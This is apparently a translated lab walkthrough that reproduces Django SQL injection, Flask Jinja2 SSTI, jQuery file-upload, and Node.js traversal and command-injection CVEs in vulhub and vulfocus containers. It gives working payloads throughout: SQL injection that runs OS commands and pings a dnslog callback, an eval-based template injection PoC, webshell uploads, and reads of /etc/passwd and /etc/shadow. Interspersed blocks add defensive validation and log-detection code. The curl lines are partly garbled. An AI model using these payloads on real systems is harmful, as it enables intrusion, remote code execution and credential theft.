Service Attack and Defense - Framework Security & CVE Reproduction & Django & Flask & Node.JS & jQuery Vulnerability Reproduction
Introduction to middleware list
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoss, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.
1. Development framework-PHP-Laravel-Thinkphp
2. Development framework-Javaweb-St2-Spring
3. Development framework-Python-django-Flask
4. Development framework-Javascript-Node.js-JQuery
5. Other frameworks-Java-Apache Shiro & Apache Solr
Common language development frameworks
PHP: Thinkphp Laravel YII CodeIgniter CakePHP Zend etc.
JAVA: Spring MyBatis Hibernate Struts2 Springboot etc.
Python: Django Flask Bottle TurboGears Tornado Web2py etc.
Javascript: Vue.js Node.js Bootstrap JQuery Angular etc.
Security testing of common middleware:
1. Improper configuration – parsing & weak passwords
2. Security mechanism-specific security vulnerabilities
3. Security mechanism-weak password brute-force attack
4. Security application-framework specific security vulnerabilities
Middleware security testing process:
1. Determine middleware information – name & version & third party
2. Determine middleware problems-improper configuration & open vulnerabilities
3. Determine middleware utilization-weak password & EXP & framework vulnerabilities
Application service security testing process:
1. Determine service opening status – port scanning & combined applications, etc.
2. Determine the service type ownership-database & file transfer & communication, etc.
3. Determine service utilization methods – specific vulnerabilities & unauthorized & weak passwords, etc.
Development framework component security testing process:
1. Determine the types of common language development frameworks
2. Determine the CVE issues in the development framework
Python development framework security-Django & Flask vulnerability recurrence
Django development framework
Introduction: Detailed explanation of django (Python Web framework)
Django is an advanced Python web framework for quickly developing secure and maintainable websites. Built by experienced developers, Django takes care of the troublesome parts of website development, allowing you to focus on writing your application without having to develop it from scratch. It is free and open source, has an active and thriving community, rich documentation, and many free and paid solutions.
Django is a popular open source web framework written in Python on which many websites and apps are built. Django adopts the MTV pattern, that is, model (M), view (V) and template (T). With Django, programmers can easily and quickly create high-quality, easy-to-maintain, database-driven applications, and Django also has many powerful third-party plug-ins, making it highly extensible.
Security issues:
CVE-2019-14234
CVE-2021-35042
…
Vulnerability reproduction
CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)
Exploiting the vulnerability requires the application to use JSONField/HStoreField and to let the user control the lookup (key) names passed to a QuerySet. Django's built-in admin application is affected, which gives an easy way to reproduce the vulnerability.
Lab environment: vulhub
Reference: Django JSONField/HStoreField SQL injection vulnerability reproduction
Start the environment:
To access the web interface:
First, log in to Django-Admin using your username and password.
http://your-ip:8000/admin/
Account: admin
Password: a123123123
Successful login:
Then go to the list view of the Collection model:
http://your-ip:8000/admin/vuln/collection/
Add detail__a'b=123 to the GET parameters, where detail is a JSONField:
payload:
http://your-ip:8000/admin/vuln/collection/?detail__a'b=123
You can see that the single quote injection is successful and the SQL statement reports an error:
Create the cmd_exec table:
payload: /admin/vuln/collection/?detail__title')='1' or 1=1%20;create table cmd_exec(cmd_output text)--
Execution effect:
Created successfully
Use cmd_exec to execute a command:
Obtain a DNSlog address first.
payload: /admin/vuln/collection/?detail__title')='1' or 1=1%20;copy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--
DNSlog echo effect:
CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)
Exploiting the vulnerability requires the application to use order_by and to pass user-controlled input to it.
Lab environment: vulhub
Reference: Django QuerySet.order_by SQL injection vulnerability reproduction
Start the environment:
To access the web interface:
First, go to the list view and add the order parameter to the GET parameters.
payload:
http://your-ip:8000/vuln/?order=-id
After execution, the data is sorted by id in descending order:
payload:
Installation directory: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select @@basedir)),1)#
Version: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select version())),1)#
Database name: /vuln/?order=vuln_collection.name);select updatexml(1, concat (0x7e,(select database())),1)#
The unbalanced closing parenthesis is injected successfully, and the information is returned in the error message.
View the installation directory:
Extract the version number:
Extract the database name:
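Both Django issues above come down to user input reaching SQL as a lookup or ordering name. As an added example (not from the original post), here is an allowlist check a view can apply before such a parameter ever reaches the QuerySet; ORDERABLE_FIELDS, JSON_FIELDS and the model fields are assumptions.

```python
import re

# Added example (not part of the original post): allowlist validation for
# user-controlled QuerySet lookup and order_by names, the defensive idea
# behind CVE-2019-14234 and CVE-2021-35042. The field names and the
# Collection model's JSONField are assumptions for illustration.

ORDERABLE_FIELDS = {"id", "name", "created"}   # assumed Collection fields
JSON_FIELDS = {"detail"}                       # detail is the JSONField used above

# An ordering name: optional '-' then one identifier. Deliberately no '.',
# ')', ';' or whitespace, so 'vuln_collection.name);select ...' cannot pass.
ORDER_RE = re.compile(r"-?[A-Za-z_][A-Za-z0-9_]*")
# A key-transform lookup: JSONField name followed by one or more key segments.
# The quote in detail__a'b is not an identifier character and is rejected.
LOOKUP_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:__[A-Za-z0-9_]+)+")


def clean_order_param(value):
    """Return a value safe to pass to QuerySet.order_by(), or None.

    Syntax is checked first, then the bare field name must be in the
    allowlist: a syntactically valid but unexposed column (e.g. '-password')
    would still leak data through sort order, so it is refused too.
    """
    if not isinstance(value, str) or not ORDER_RE.fullmatch(value):
        return None
    if value.lstrip("-") not in ORDERABLE_FIELDS:
        return None
    return value


def clean_json_lookup(param_name):
    """Split a lookup such as detail__title into (field, [keys]), or None.

    Rejects any name that is not a known JSONField or that contains
    characters outside [A-Za-z0-9_], independent of the ORM's own fix.
    """
    if not isinstance(param_name, str) or not LOOKUP_RE.fullmatch(param_name):
        return None
    field, *keys = param_name.split("__")
    if field not in JSON_FIELDS:
        return None
    return field, keys
```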
Flask Jinja2 SSTI
Introduction: Detailed explanation of Flask
Flask is a lightweight web application framework written in Python. Its WSGI toolkit is Werkzeug and its template engine is Jinja2. Flask is licensed under BSD. Flask is also called a "microframework" because it keeps a simple core and uses extensions to add functionality; it has no default database layer or form validation tool.
Security issues:
Flask (Jinja2) server-side template injection vulnerability
…
Vulnerability reproduction
Flask (Jinja2) server-side template injection vulnerability
Lab environment: vulhub
Reference: Flask (Jinja2) server-side template injection vulnerability reproduction
Start the environment:
To access the web interface:
Next, access http://your-ip/?name={{123*123}}. If the result 15129 is returned, the SSTI vulnerability exists.
PoC that obtains the eval function and executes arbitrary Python code:
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
Note: URL encoding is required; after encoding, the payload can be sent directly in a GET request.
At the command execution point, substitute the command to run and the information to view. Each time the command is changed, the URL must be re-encoded and resent.
Other commands: ls, whoami
Execution effect:
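Since the PoC travels URL-encoded in a GET parameter, a defender looking for the {{123*123}} probe has to decode before matching. As an added example (not from the original post), a small detector run over constructed access-log lines; the combined log format and the name parameter are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Added example (not from the original post): flag SSTI probes such as
# {{123*123}} or {% ... %} in web server access logs. The log lines are
# constructed; the combined log format and the "name" parameter are
# assumptions for illustration.

TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed sample lines
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=%7B%7B123*123%7D%7D HTTP/1.1" 200 5',
    # double-encoded "{% for c in x %}": tooling sometimes encodes twice
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%257B%2525%2520for%2520c%2520in%2520x%2520%2525%257D HTTP/1.1" 200 5',
]


def decode_repeatedly(value, rounds=3):
    """URL-decode until the value stops changing (bounded), because the
    payload above must be URL-encoded and may be encoded more than once."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ssti_probes(log_lines):
    """Return (line_no, parameter, matched snippet) for every query
    parameter whose decoded value contains a template tag."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes once; decode_repeatedly handles the rest
        for key, value in parse_qsl(query, keep_blank_values=True):
            probe = TEMPLATE_RE.search(decode_repeatedly(value))
            if probe:
                hits.append((line_no, key, probe.group(0)))
    return hits
```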
JavaScript development framework security - jQuery & Node vulnerability reproduction
jQuery framework
Introduction: Detailed explanation of jQuery
jQuery is a fast and concise JavaScript framework. It is another excellent JavaScript code library (framework) after Prototype. It was released by John Resig in January 2006. The purpose of jQuery’s design is “write less, do more”, which means writing less code and doing more things. It encapsulates common JavaScript function codes, provides a simple JavaScript design pattern, and optimizes HTML document operations, event processing, animation design and Ajax interaction.
Security issues:
CVE-2018-9207
CVE-2018-9208
CVE-2018-9209
…
Vulnerability reproduction
CVE-2018-9207 - jQuery Upload File vulnerability reproduction
jQuery Upload File <= 4.0.2 allows arbitrary file upload under the root directory /jquery-upload-file.
Lab environment: vulfocus
Start the lab environment:
To access the web interface:
Access the framework's directory structure:
/jquery-upload-file/
Exploitation:
A single command accesses the site and uploads the file.
payload (the premise is that the backdoor file already exists in the current folder):
curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"
curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"
Upload shell.php:
Upload cmd.php:
Check:
Location of the uploaded file (the backdoor is a PHP file):
/jquery-upload-file/php/uploads/
Verify whether it can be parsed and executed:
Connect with AntSword:
Connection succeeded.
The other security issues listed above are reproduced in basically the same way.
Node.js
Introduction: Detailed explanation of Node.js
Node.js is a JavaScript runtime environment based on the Chrome V8 engine, used to conveniently build fast, easily scalable network applications. Node.js optimizes some special use cases and provides alternative APIs so that V8 runs better outside the browser. The V8 engine executes JavaScript very quickly and performs very well.
Security issues:
CVE-2021-21315
CVE-2017-14849
…
Vulnerability reproduction
Node.js directory traversal vulnerability (CVE-2017-14849)
Joyent Node.js is a web application platform built on Google's V8 JavaScript engine by the American company Joyent. The platform is primarily used to build highly scalable applications and to write connection code that can handle tens of thousands of simultaneous connections on a single physical machine. Node.js 8.5.0 (before 8.6.0) contains a security vulnerability that a remote attacker can exploit to access sensitive files.
The cause is a logic error in the normalize operation that Node.js 8.5.0 performs on paths: when climbing to upper directories (such as ../../../../../../etc/passwd), inserting foo/../ in the middle (such as ../../../foo/../../../../etc/passwd) makes normalize return /etc/passwd, whereas the correct result should be ../../../../../../etc/passwd. Web frameworks such as Express usually provide a static file server that relies on the normalize function; for example, when Express determines whether a path leaves the static directory, it uses normalize. The bug above makes normalize return an incorrect result, so the check is bypassed and an arbitrary file read results.
Lab environment: vulfocus
Reference: CVE-2017-14849 reproduction
Start the environment:
To access the web interface:
The page references the file /static/main.js, indicating that a static file server is present.
Construct the request:
Send the following path in a GET request: /static/../../../a/../../../../etc/passwd
Complete request:
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: 192.168.100.134:56111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Send the request to the repeater and resend it:
(If you capture the packet from the browser and then modify the request, the response may not come back normally and an error status code may be returned; try removing the cookie and other related headers. If the response comes back normally, there is no need to remove them.)
Effect: the /etc/passwd file is read successfully.
Effect: the /etc/shadow file is read successfully.
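For the check that the traversal bypasses, an added example (not from the original post, and not Express's or Node's code): path normalization and a containment test for a static file handler, written in Python so it runs on the post's own request paths; STATIC_ROOT and the URL prefix are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Added example, not from the original post: a containment check for a
# static file handler, i.e. the check that the faulty normalize() in
# Node.js 8.5.0 let CVE-2017-14849 slip past. STATIC_ROOT and URL_PREFIX
# are assumptions for illustration.
STATIC_ROOT = "/srv/app/static"
URL_PREFIX = "/static/"


def normalize_relative(path):
    """posixpath.normpath collapses '.' and '..' segments; for the post's
    example '../../../foo/../../../../etc/passwd' it yields the correct
    '../../../../../../etc/passwd', not '/etc/passwd'."""
    return posixpath.normpath(path)


def normalize_request_path(url_path):
    """Percent-decode first, then normalize as an absolute URL path, so that
    '%2e%2e' and '..' are treated alike and '..' cannot climb above '/'."""
    path = unquote(url_path)
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


def resolve_static(url_path, root=STATIC_ROOT, prefix=URL_PREFIX):
    """Map a request path to a file under root, or return None if the
    request does not stay inside the static directory."""
    clean = normalize_request_path(url_path)
    if not clean.startswith(prefix):
        # '/static/../../../a/../../../../etc/passwd' normalizes to
        # '/etc/passwd' and is refused here.
        return None
    candidate = posixpath.normpath(posixpath.join(root, clean[len(prefix):]))
    # Decide containment on the final absolute path, never on the raw
    # request string: this is the invariant the traversal must not break.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate
```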
Node.js command execution (CVE-2021-21315)
Node.js systeminformation is a Node.js module for obtaining various kinds of system information; it contains many lightweight functions that retrieve detailed hardware and system-related information. The npm team released a security advisory: the systeminformation package in the Node.js library has a command injection vulnerability (CVE-2021-21315) with a CVSSv3 score of 7.8. An attacker can execute system commands by injecting a payload into unsanitized parameters.
Lab environment: vulfocus
Start the environment:
To access the web interface:
Construct a GET request:
payload: /api/getServices?name[]=$(echo 'rumilc666' > rumi.txt)
After execution:
Verify:
The file was generated successfully:
docker ps
docker exec -it <container-id> /bin/bash
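The name[] trick works because the parameter arrives as an array rather than a string. As an added example (not from the original post and not the systeminformation module's code), the faulty type-dependent sanitization beside a version that validates every element and never builds a shell string; the command and the parameter handling are assumptions.

```python
import re

# Added example (not from the original post and not the systeminformation
# module's code): a CVE-2021-21315-style parameter handling bug beside its
# fix. The assumption is a handler that receives the 'name' query parameter
# (a string, or a list when sent as name[]=...) and builds a status command.
SERVICE_NAME_RE = re.compile(r"[A-Za-z0-9_.@-]+")


def vulnerable_command(name):
    """The risky pattern: a string is sanitized, then everything is joined
    into ONE shell string. A list (name[]=... in the query string) skips the
    string check, so '$(...)' survives into the command line."""
    if isinstance(name, str):
        name = re.sub(r"[^A-Za-z0-9_.@-]", "", name)
        return "systemctl status " + name
    return "systemctl status " + " ".join(name)


def clean_service_names(param):
    """Accept a string or a list of strings, validate every element with the
    same rule, and raise ValueError for anything else (other types included)."""
    if isinstance(param, str):
        items = [param]
    elif isinstance(param, list):
        items = param
    else:
        raise ValueError("name must be a string or a list of strings")
    for item in items:
        if not isinstance(item, str) or not SERVICE_NAME_RE.fullmatch(item):
            raise ValueError("invalid service name: %r" % (item,))
    return items


def safe_command(param):
    """Argument vector for subprocess.run(argv) with shell=False: the shell
    never parses it, so '$(...)' would stay a literal even without validation."""
    return ["systemctl", "status", *clean_service_names(param)]
```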